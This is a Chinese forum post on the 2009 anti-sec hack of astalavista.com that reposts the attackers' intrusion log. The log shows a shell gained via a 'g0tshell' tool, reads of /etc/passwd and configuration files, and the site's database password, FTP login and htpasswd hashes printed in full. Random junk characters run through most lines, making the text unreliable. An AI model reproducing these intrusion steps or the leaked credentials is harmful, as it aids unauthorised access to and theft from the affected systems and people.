里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
4 y- Z" d+ h( T- F6 t4 @5 ]" M. ^8 G( `) a# P" s# y4 q0 U
[root@front3 ~]# curl -I litespeedtech.com
& _3 E6 ^9 W$ D: ^- o# r- ^HTTP/1.1 200 OK
5 v; r% b2 b1 R G; F; eDate: Fri, 05 Jun 2009 22:54:51 GMT
, ^. m# F7 c% ~4 D3 k' _5 KServer: LiteSpeed
1 G; W. \* P/ D+ j2 D% k4 g. p* T9 t% w* Q! o
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
( n4 W+ Z; ]; u" S8 q8 k a% \: Z" C3 i% L
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。$ T' E6 I) A' R; z7 | C7 ~
* Z+ Q" _) H, q. k0 x. J, q
! V1 Q; u$ j7 e. _/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
% X& e# N# G, A/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \ t. }' Z3 `7 [4 ]
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
% a' b: z: K3 d' F\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /7 }7 ?/ N. x' ]6 N& R$ |3 f
\/ \/ \/ \/ \/ \/ \/
5 M( D0 C, ]; p. Y! |* z' U The Hacking & Security Community
& c! E$ v( G& c0 c4 L[+] Founded in 1997 by a hacker computer enthusiast
* w6 p5 P2 u4 F* J# a4 D1 o: ?[-] Exposed in 2009 by anti-sec group
$ B$ y9 ?8 `! e8 f& i( `* y3 l4 J% F9 M' g$ Y( h
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:% ^( Y" n: B+ R2 u$ u
>> 03. Who’s behind the site?' }! J% n1 ~% z" o+ p( `9 H1 v" e9 N
>>
. N2 l, W+ [* h3 y>> A team of security and IT professionals, and a countless number of contributors from all over the world.5 M# T) S. K" z, p5 X* p
' J* s# a5 T0 q7 @>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
8 W& C7 I3 k9 u [>>* z+ _+ T/ q3 { o- T8 t/ o. j& b
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
$ k/ g/ F; Q0 E) Emilitary institutions., B8 h$ s; g+ J4 |" y1 w9 l3 A3 d
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
$ a$ k: s' z. l( N2 C( l' C8 ?& N$ ^( U4 _
Why has Astalavista been targeted?
! c; B3 E, I, A3 ~9 Z, s3 p. B9 M. k; x9 c8 H( r
Other than the fact that they are not doing any of this for the “community” but3 D! e& X2 a: @6 H
for the money, they spread exploits for kids, claim to be a security community
! J3 |5 @1 f* b/ ^5 Z(with no real sense of security on their own servers), and they charge you $6.66
- _- |7 J/ B, ^, Sper months to access a dead forum with a directory filled with public releases
! @, \! L1 V3 X: Nand outdated / broken services.) U: h, h! I. q5 e4 m! x
! E& |7 s' ?9 o" P0 iWe wanted to see how good that “team of security and IT professionals” really is.8 O6 h2 h$ o9 e. \
! K0 E4 K# a& P0 }0 s; LLet’s begin.. r) I$ V+ C; K/ D1 |3 r
9 t8 g t) ]* lanti-sec:~# ./g0tshell astalavista.com -p 80
9 U5 N$ }4 t! p. n. Y[+] Connecting to astalavista.com:805 E9 `, }7 b" s F9 a
[+] Grabbing banner…# L: ]3 o: f, v/ v1 y9 Y
LiteSpeed
; B9 X* T5 J3 x! @1 @( _6 @5 A[+] Injecting shellcode…( H1 x7 U9 [, ^% G! ^. P
[-] Wait for it$ U. A+ V! D+ m {8 v
/ i* K! Q0 k4 v[~] We g0tshell
- W. x! _( u8 R' F! buname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux- |6 v$ X- o: g _, m* i
ID: uid=100(apache) gid=500(apache) groups=500(apache)/ _6 y2 c" p4 U. Y
( z4 P& _+ F" R7 N1 o$ k' K
sh-3.2$ cat /etc/passwd
- h! E b+ w, h0 H7 F$ g ~root:x:0:0:root:/root:/bin/bash
9 X% S$ N9 r$ _bin:x:1:1:bin:/bin:/sbin/nologin9 v6 K7 ~& k7 p u( z
daemon:x:2:2:daemon:/sbin:/sbin/nologin
/ p: V M* E$ D( a' W& [adm:x:3:4:adm:/var/adm:/sbin/nologin
: y' {* O' Y7 i$ L qlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
0 N0 V: m, y/ e! Psync:x:5:0:sync:/sbin:/bin/sync
# U- O' R2 \+ s4 p& sshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
8 l+ R0 ~# z, N0 n g: `, M$ Bhalt:x:7:0:halt:/sbin:/sbin/halt
) N( V# ~) C9 n7 d$ Rmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
1 R: q! |2 @: S/ r* m, M2 Snews:x:9:13:news:/etc/news:& u5 i% W- d8 F9 R% k! Q7 v
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin, |$ A' R/ O4 o6 `7 V) D
operator:x:11:0 perator:/root:/sbin/nologin
3 N; F& c$ c. `& k3 _- G3 Pgames:x:12:100:games:/usr/games:/sbin/nologin# v2 E4 I& d0 \+ b( o# _
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin6 b; G1 K1 K: b9 V& F
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin& Y" `* n0 a. R5 s# I
nobody:x:99:99:Nobody:/:/sbin/nologin! v; ?1 Z, _% [8 s
rpm:x:37:37::/var/lib/rpm:/sbin/nologin% P- @# I) _$ p. M0 Q2 ~
dbus:x:81:81:System message bus:/:/sbin/nologin: k/ Z% M- J* m/ n' K
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
" _0 y5 i! m7 n0 gmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin5 @; v$ k- a9 W) y, L: T
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin3 b: P9 A4 }! _$ Z& r
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin! k( C5 R/ K( }, g# ^3 t, ?
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
3 _+ B7 q0 U& v, erpc:x:32:32 ortmapper RPC user:/:/sbin/nologin! j* E! i! H# L7 R1 I/ U% l
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin4 ~6 R( ^# R" A; O7 Z
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
) K. k9 o" P( H* M$ Zsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
2 r7 c% l$ D3 [- f1 B! x; c: Dpcap:x:77:77::/var/arpwatch:/sbin/nologin% s% d8 s% J1 t% X% {9 b
named:x:25:25:Named:/var/named:/sbin/nologin
' {$ S4 r' T4 I# D; |/ Japache:x:100:500::/var/www:/bin/false
6 X4 \; j& g* k/ U5 z' J2 Mdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
2 J% \, r7 f" c R- k* Wmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
7 z9 V4 x. F# ^, Dwebapps:x:500:501::/var/www/html:/bin/bash
4 |4 Q. \' E( O" `: K! p* a. Ymajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash7 @- ], Q* J- t% \2 @" j) H2 ]# e8 B2 S/ D
admin:x:501:502::/home/admin:/bin/bash
; z ]% o2 x* ^& Zjon:x:502:503::/home/jon:/bin/bash( o& x2 h; H# x a6 ~* ` N' z
com:x:503:504::/home/com:/bin/bash5 @/ Q/ k1 x. U' e0 n
ntp:x:38:38::/etc/ntp:/sbin/nologin
* K% ?( U1 R1 I, H3 Z9 c) p% H0 vais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
$ | S% V u2 a$ h9 I( oastanet:x:504:505::/home/astanet:/bin/bash$ r% |% y# H# F. |' D; s2 C8 d! `* A
avahi:x:70:70:Avahi daemon:/:/sbin/nologin% t& r/ Y6 R6 }$ \3 ?8 ^
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
/ n3 D" M0 l7 e
+ w+ ~3 l n2 s+ H: L/ _sh-3.2$ cat /etc/hosts
2 w0 L. H$ J2 N( j& h9 X5 r) r( P9 c# Do not remove the following line, or various programs
4 E* a$ Z% U9 r% N( S5 S# that require network functionality will fail./ D3 E, M# D$ `& w
127.0.0.1 localhost.localdomain localhost
3 f U. y& K3 o::1 localhost6.localdomain6 localhost6( A! Y% m B2 d* T+ T
80.74.154.172 asta1.astalavistaserver.com
; M, d& \# e3 v0 ]) `+ I- Z5 b4 j# J; ~
sh-3.2$ pwd
, c ^1 u$ ~; m/home/com/public_html; s5 U2 N6 S% D* w5 j7 K* ~" D# i
% ?" d0 N7 ^6 T# ]/ y; esh-3.2$ ls -la
& c* h, p6 L1 Ytotal 184602 v, h# P; K( i7 [; z$ K, t* B
drwxr-xr-x 30 com apache 4096 May 28 17:06 .* c% H1 T3 j4 \) n! q; N) _( P
drwx–x–x 11 com com 4096 Jun 25 2008 .., ^% p$ Z! f% y5 B
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
9 f8 z+ V6 s# A1 }! F8 Hdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache* E! J8 l1 ^2 x l9 G: b
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
6 N: g( |8 Y4 e3 bdrwxrwxrwx 2 com com 4096 May 19 00:50 config
# ]0 x: w5 e7 F4 p/ j4 {drwxr-xr-x 2 com com 4096 Mar 20 11:05 core2 [3 a0 }. A6 [
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules% B( P; y7 P5 ~+ y1 x- V
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
+ U5 P- o% a2 p! edrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
% G& m2 [ V4 N$ w% J$ l9 s: `# edrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
b) r: P! [0 G: D" s6 T" N$ Q& X$ ]-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php5 M C( P: F5 b
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd+ s- d6 {' A, l; J. C
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor0 T8 J+ ]' h. x2 ?) d
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico" h3 Z n' {; @. N4 A# e0 `/ \
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed3 }: d* M% _1 z7 q, D0 Q" b2 T* {
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess, D- O: U( o4 M# t+ I0 S
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak4 Z, U! ]8 m+ B4 Y* T6 Q: }
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
& a2 \/ v* h. a3 F. ]& o% g* x% Gdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
$ J2 m3 x3 V0 P+ _3 u2 u+ ?drwxrwxrwx 14 com com 4096 Feb 2 19:29 images' h, N. J( i! B! c6 V- q/ @3 P
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
& D! O. e% N* d# g* ldrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
. D5 \; t: E! p0 xdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang) S9 e1 D5 M' ^# G1 i" Y2 l& j
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib2 k" C$ [' j& M! F- {. u
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media7 M R5 `5 I5 w; B) O; f
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications+ l5 X# ?) N: C( F7 n2 g
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
' g# ?7 S* y W2 l( U3 O @8 J0 Z4 Wdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin3 w w# ~" h( w3 U. y
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
* s! b, ~+ l; u% o$ Q- w* bdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old2 W3 Q1 Y$ K8 ] R, N; h
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy/ l+ Y$ ]) M4 \3 t! N: }
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy( I0 K/ s. l8 _1 a- ?: P
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt) z d2 @$ ]8 a; m/ n4 e* V
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml; u' p4 L/ H$ A* g- k# h
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php/ o! c8 A( {6 s. F/ B( W6 N
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
n: E: K/ N8 o" m# \9 n& y/ y5 e6 Odrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp& l9 |" [8 U( _# ]7 j% C: [3 v
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
* I7 C" v6 l% x9 |
. u7 e D( r5 }. I6 R1 {/ wsh-3.2$ head -20 index.php; |5 e+ K1 M' R$ n! w& p
<?php
/ O# f& e2 M: k1 ^, Z( Z [( z* N' Y* [
/**1 B i. x) ]4 E- w% l. W
* The main page for the CMS
8 J' A( ~" t3 w* @copyright CONTREXX CMS - COMVATION AG
! }4 x; Q0 U0 X" y, d5 M$ C8 ?* @author Comvation Development Team
; R& Y7 t: u3 |* `/ y b2 R6 N* @version v1.0.9.10.1 stable
4 d- q& R2 }7 `: o0 {* @package contrexx$ H; k( w4 C0 n3 u) b0 H
* @subpackage core
$ S+ h& [7 L9 p5 V* @/ ]* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
$ m* ?1 W# l$ V' y/ E* @since v0.0.0.0
' q; d$ T! i1 z, W& z* @todo Capitalize all class names in project
% h Z7 c8 X) }8 K* @uses /config/configuration.php0 s d, [' @- `* O) F
* @uses /config/settings.php
" S( B' m) K" D0 n* @uses /config/version.php
8 o# [2 y& d' v4 ]* B z* @uses /core/API.php
5 V/ w9 k, Y* M9 C5 ~; q9 U, O6 K% x* @uses /core_modules/cache/index.class.php; Q5 ~1 _0 }2 V; ~
* @uses /core/error.class.php
* V! c/ `# ~* T1 n# O D* @uses /core_modules/banner/index.class.php' W% {5 g& C( o% D* _4 Q2 k& b8 y
* @uses /core_modules/contact/index.class.php
; P) `. \/ ?) n/ D! s2 s; E- l& B5 O+ m4 }
sh-3.2$ cd config/
$ q! [+ P9 @0 ]" csh-3.2$ ls -la; a5 t$ Q: L) V' K
total 32
, L1 `' _( f) S8 X: Bdrwxrwxrwx 2 com com 4096 May 19 00:50 .
$ \ p+ {4 p( `; mdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
3 k. e( r, N% P, f |8 ?-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
1 \# ^# n7 q, I4 K-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php& S6 G* E7 h+ t0 l
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php& s9 ^1 C4 q; ?( A4 ]* U
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
) D* o1 _* B1 |! R0 x4 u1 t, z8 |/ K/ E; K r
sh-3.2$ cat configuration.php" q* ^9 B4 B' }# \ g7 l
[snip] E, ?+ s- n! A/ c; |, k
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost" D+ h z1 l6 r5 f& R# \
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name7 t) q( Q% {# k# @8 {+ s" n
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix& G$ M, p3 ]5 a6 m3 v
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username7 u$ u; _. e/ n- z
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
0 h6 c8 m4 q. n( y( y$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
6 s1 u% @: B. x* A5 h$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
- c( X9 z& q; v6 \$ J[snip]
6 A; h8 Z* z$ B' y; r, y/ f- z1 m$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
, y/ {4 j( Q/ d, q5 ~$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
5 k( i+ G7 C# O$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
( [" l1 L5 f3 Q$_FTPCONFIG['port'] = 21; // Ftp remote port
. p, \2 T( v7 v) [" F$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
" h; |1 w, U7 S% W3 p. L3 O$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password+ N1 x/ F/ V y% U0 s
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
3 E, c' o6 Y% F. V& L% }7 g$ x* @
sh-3.2$ cd ..
0 a. z8 t0 u3 [sh-3.2$ cd dvd/
! ~: U6 q' j1 l+ R8 @sh-3.2$ ls -la( ~7 \0 Z0 u7 j( t5 N2 g& D8 J
total 2913780
) F4 N( z5 v+ ^( A c* y. gdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
7 `6 d. w( t; u+ n- b6 Cdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..5 ~' p2 N+ Z5 S4 p' z
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
9 f! E- ]0 W- q( A0 J-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar! N& _" z0 @8 |
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
- w- I1 y1 ^ ]4 \0 u-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess. _/ W! G+ O4 d1 r
4 [9 `' ~) `+ ?4 ~, A$ b; F
sh-3.2$ cat .htaccess- z8 v4 @! z g! a
authType Basic- O% A$ Q) x/ X
authName DVD0 n$ U5 i7 @4 r
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd9 _! e2 Y/ A+ d$ [; T4 d* b
require valid-user8 t! t0 ~" L+ n/ K9 `6 z1 s
! n& K: P! d3 n; t9 D' e, Q) Xsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
5 j( @% o4 R) \+ S5 K7 g" [DVDdownload:CRD8cuY6.MPT6
3 k' w {5 X) I) dDVDdownload2:CR8a36.wluFMg
p& R+ B" k( W0 _
& L4 S d: J% ~7 Y( Z7 v: Ish-3.2$ cat test.php
8 L5 @/ J7 n5 Z<?php% N8 O+ {; ?% i
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
5 d/ t. d4 q6 O: v! A% B: s% F$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
, w% w) Y( H& ?: W6 ?# oecho $url;6 F. Y- X5 U/ V7 U, k+ ~1 Z s* W
?>( _9 f! c, t v/ |, @
, T( s, ~1 l1 ^# q' r2 Gsh-3.2$ cd modifications/
7 g+ {: K1 P0 N7 ~2 t* o6 ash-3.2$ ls -la
0 y [# ~# ^4 xtotal 326 X0 Q* B: G. o3 O# f9 a
drwxr-xr-x 8 com com 4096 May 11 12:48 .6 s- z4 u' E7 C2 D$ u! L4 t
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..1 Z j+ a, t- l
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
! u2 A* f2 U M9 ldrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
5 _' L) }4 S$ L u9 W* Mdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools" a6 o4 x: T+ C; P ?+ S/ x1 D
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
/ A5 I3 U% m7 w) {: N+ `$ |- Idrwxr-xr-x 2 com com 4096 Feb 2 19:33 search( z2 ^' y( L0 Y. C+ L0 T
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp( n( \ K) d6 G7 K7 n2 [+ H4 a5 B
9 c7 ^" ]* H! B$ w. w, \sh-3.2$ ls -R
. F+ G1 |8 s$ k.: c. c: v$ S8 Z. K: K; R# V( G
com_avtng cronjobs onlinetools pjirc search _tmp
) @) Y% T! y* e6 f, _6 S2 h) J) w# X0 k1 ]$ S( M* _4 H0 z: ]
./com_avtng:+ W9 h5 R# t$ h4 v: x; `
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts: q! a7 e" ?$ `+ A
1 }0 T/ _ J( q$ t `6 i2 G
./com_avtng/scripts:
( R4 B' q' m/ | V6 x+ p, D2 |9 ~popunder.js
( T# s& U1 P9 [7 p8 w r+ ? W) e G$ o6 |7 R/ c- K
./cronjobs:4 v3 R g3 t. Y7 d1 ~: W
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp1 L) W; e% ^2 ?' C, S: ~ T
, ~; Z/ \# D# y8 a; n
./cronjobs/tmp:3 L; y9 v2 s6 b. @* T
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
# S# B7 C# R+ x7 B6 F7 x) `$ ^, }$ S' `; Y0 z( p
./onlinetools:
* f+ q. s- p. Vindex.php
" v: K& Y0 ], I% C+ G$ H+ B( s' s+ s4 ]1 Y, k6 v
./pjirc:" `8 ^. ~$ B, t( u( M$ e9 ^# u: q; L
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt- c" Y$ x8 i! o$ a/ k! G+ r" K6 d
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
( ~3 E0 n8 x9 F3 e0 Pbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
3 @$ s; \8 ~9 M3 C; |3 K7 X7 z" F
./pjirc/img:
9 h# W1 k1 M. y5 P1 lange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif" _7 o7 W! D- w$ l
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 7 k p" a# x# c8 c E! b
verre-eau.gif$ f8 d' e% i) w* R
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
) k: h# g1 h7 E( Pverre-vin.gif# i8 }3 {( s7 T* ~$ s# T
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif& Z" S" U# n7 Z( I; H/ V" `3 W
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
3 }7 N1 a4 U! v/ l/ }
2 _, {2 N- w8 {8 {6 }4 {./pjirc/snd:4 D+ Y5 n* u% C# g( E9 S. v
bell2.au ding.au N+ O7 ~: f m$ k3 T4 W
" Q0 d1 v& D; G' u6 B./search:
( B4 O3 m( u' @! T# e" zsearchEngines.php search.php
) r D+ c' I" { e" z4 k3 m) w, U
9 I+ h: W6 W' }2 s/ A./_tmp:2 F6 S/ D. g3 Y" C: ~4 B
defaultPorts.php defaultPorts.txt1 | Y p- [& G9 F6 h- C# h7 k
G8 B. j3 V( g. {+ c# u; g
sh-3.2$ cd cronjobs/
; d+ U4 P2 n+ ?/ W3 g8 D& {sh-3.2$ cat exploits.php
! [* F9 {. G8 S( y h5 [$ _) }) H[snip]
0 w: W: w t) z" `0 H f: P$categories = array();
4 O7 _% m. C1 I! ~ O; H$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
- \. X. Z% k8 T- {8 i3 F! w$expolits = file($milw0rmFile);
+ v$ A S* b5 v) o, D$comExploits = array();( B3 k% X0 F; W @' G
[snip]
4 u/ R* @, w' h* a( _// manage data) J( q( W2 b2 V
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640) ^0 _8 P. @& d
: l) a$ ?- z* g/ x6 Z& T/ S
// get path and title/ a/ A& C4 v# C. M8 [' B' j
$expolits[$x] = trim($expolits[$x]);, s5 F7 a: g: R* q# Q
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
# c! Y* P- |: K6 K7 d $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);" T/ U1 e9 }/ z: e/ u$ U5 G
* v/ ^0 y# `$ K) F8 S, n- q // check if file exists
: ^! V$ J; Q4 r if (file_exists($path)) {
+ Q0 C- t5 H6 `- |9 H( W7 @0 b8 \
$text = file_get_contents($path);
0 N# M/ C+ m) J% Y
# e$ K& f7 r6 Q' t9 e8 |/ N8 ` // get content and date6 Q8 N c# K, F9 K# W' F+ X! o& F
//$text = htmlspecialchars($text, ENT_QUOTES);
2 L( O. i6 {2 b* d* }2 f( N) G $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
2 b/ L8 G9 k/ E1 g) o0 ]: v; s if ($tmptext != ”) {5 l6 q x$ C+ F* g% |- N
$text = $tmptext;
& u/ ~) K0 K7 A7 w( h6 I6 R5 @ } else {
/ D0 G# }" ?( U$ Y, [1 ?+ X $text = addslashes(htmlentities($text, ENT_QUOTES));
0 r1 G: a |' l1 `. e }5 d; D6 K. m7 M/ L9 t ?2 ~% r3 j
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));3 \7 d+ x/ n c# ]5 F
$tmp = explode('-', $date);
Z# W6 s \& Z# k $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
# }% `9 A0 }5 c6 w* _6 k $cat = getCategory ($path);
* x; Z) r) ?/ a5 _) a# g& g $ext = pathinfo(basename($path));6 J3 P) s4 s, d1 \& f# l
$ext = $ext['extension'];
( [( Z& O3 K2 e' i" t% H1 ]# | $qStr = ”
5 q5 ^! A- N9 u# G SELECT `id`0 A. q8 @+ U, B9 H$ x
FROM `contrexx_module_exploits`
, x7 _. G/ w0 z2 ^$ r WHERE `title` = ‘” . $title . “‘
, i! p+ Y3 u! i; j1 D AND `date` = ‘” . $date . “‘% {# Y( M2 A, A
“;" ?0 y, p/ F1 j2 O' L: Z9 p
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;8 G/ a# N, A! W1 J
$q = $_objDB->query($qStr); L% S4 n+ H/ G; |
! s$ }. y$ u) _2 B if ($q->numRows() == 0) {
8 G) u* W7 `& r& O. j# b
) e' _3 H y) K8 P+ Z // prepare array
/ \9 M* S9 J7 P$ N) }9 D $comExploits[$x]['date'] = $date;
' z: e/ m5 w( d0 _4 a m: L) Q4 c $comExploits[$x]['title'] = $title;/ h% j& B: A3 Z& ?1 [& ~4 M
$comExploits[$x]['author'] = ‘milw0rm’;
, ~8 o' p `7 V $comExploits[$x]['text'] = $text;" ^ b- l( \' R2 u& Y
$comExploits[$x]['source'] = $ext;! X/ T' t- x/ U+ G. o! f/ s6 f; W; @
$comExploits[$x]['url1'] = ”;6 f! W" Y$ ^9 I$ c- ?' r6 ~; h
$comExploits[$x]['url2'] = ”;
# x/ F. W. p. h; H1 m' }* x* H4 j9 I $comExploits[$x]['catid'] = $cat;5 N( y$ {4 X/ V! V0 F
$comExploits[$x]['lang'] = ‘2′;* K& x. Z$ n2 f* v6 C8 i3 U
$comExploits[$x]['userid'] = ‘12′;
3 b4 J) S/ r) ~* F $comExploits[$x]['startdate'] = ‘0000-00-00′;
: q/ G( L: m9 U0 d3 [6 D) ] $comExploits[$x]['enddate'] = ‘0000-00-00′;
J9 F, @/ [' j& x $comExploits[$x]['status'] = ‘1′;
& f9 n8 f) n% L; e5 _) Q$ ?# J $comExploits[$x]['changelog'] = $date;
. D- z) k, {# J
T9 |- z8 E* \ }0 ?/ M$ o& ?4 ?( a. K6 E
[snip] Z! l: c* s( g( x T$ Y
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>, h! f# V" a3 Q
<rss version=”2.0″>7 ~7 I- J1 ]0 s8 q; K
<channel>/ u a- I1 I/ }; h2 d
<title>ASTALAVISTA.com - Exploits</title>+ {5 o9 G( ~6 b& z0 e- c4 V
<link>http://www.astalavista.com/exploits</link>; T' |' N: E8 ?6 H; c Q
<description>All availably Exploits.</description>
